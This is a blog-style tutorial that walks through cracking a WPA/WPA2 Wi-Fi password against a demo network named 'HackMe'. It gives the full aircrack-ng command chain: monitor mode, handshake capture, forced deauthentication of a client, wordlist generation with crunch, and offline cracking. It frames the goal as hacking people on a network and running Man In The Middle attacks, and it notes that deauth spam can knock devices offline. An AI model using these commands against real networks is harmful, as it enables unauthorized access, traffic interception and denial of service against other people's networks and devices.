Basic cracking Wi-Fi WPA/WPA2 (Word List)

In every home, office, etc. we probably can find WiFi. Gaining access to access points is really useful if we want to hack someone connected to a specific one. Thanks to that, we, for example, can perform Man In The Middle attacks. So, it’s good to know how to acquire a WiFi password. 

Nowadays,  WiFi is mostly secured by WPA/WPA2 technology. There are some ways to obtain a password easily (unfortunately, this method needs some luck). I will show how to crack every network using a world list. This method basically tries every single password we provide and checks if it fits, but it skips connecting to the router, so password checking is much, much faster. We can use many common world lists from the web or we can create own. However, at the end of the day, the correct password also has to be provided in the world list.

And there is one more hook. We must have a WiFi adapter that supports monitor mode.

I created a WiFi with SSID “HackMe”. 

As you can see on screenshot my WiFi adapter is called wlx00c0caaab23c 

and now we must set the monitor mode in the adapter by, for example, using the following commands:

airmon-ng check kill wlx00c0caaab23c
airmon-ng start wlx00c0caaab23c

In this mode we can listen to what packets are transmitted in the air, by typing:

airodump-ng wlx00c0caaab23c

Our target, “HackMe”, has MAC 3C:84:6A:74:9D:2C and is on channel 10,

so running airodump-ng, however this time with some additional parameters, allows us to capture only packets of this specified WiFi and write everything to file.

airodump-ng --bssid 3C:84:6A:74:9D:2C --channel 10 --write hand_shake wlx00c0caaab23c

Now we must capture a handshake. This contains the specific data that we are looking for. To simplify, there  is some data and the same data but encrypted by WiFi password. Access points use these data to verify correctness of the password we look for. They encrypt the same data on its own and check whether the encrypted data provided is the identical.

These are sent while the device is connecting to WiFi, so we can simply wait for a new connection to occur. Here is a much faster way, though. We can deauthorize the device and force it to reconnect by using this command:

aireplay-ng --deauth 4 -a 3C:84:6A:74:9D:2C -c F4:96:34:34:EA:B8 wlx00c0caaab23c

Fun fact; if we spam these DeAuth packets we can totally block devices from connecting to WiFi. It can be useful sometimes.

And as you can see, the airodump-ng showed us he captured a handshake. Now we need a world list, we can download some from the web or create one. I create one using crunch with most of the password correct, because of time saving.

crunch 13 13 1234567890 -o wordlist.txt -t tajnehaslo@@@

It’s almost don,. Run an app which will check every password (until the correct word will be found or the list will end). I will use aircrack-ng, but you can also use for example HashCat which uses GPU and it’s much faster than aircrack-ng which uses CPU.

aircrack-ng hand_shake-01.cap -w wordlist.txt

Finally, we cracked the password to target WiFi. Output show clearly that password is “tajnehaslo123”.

Leave a Reply

Your email address will not be published.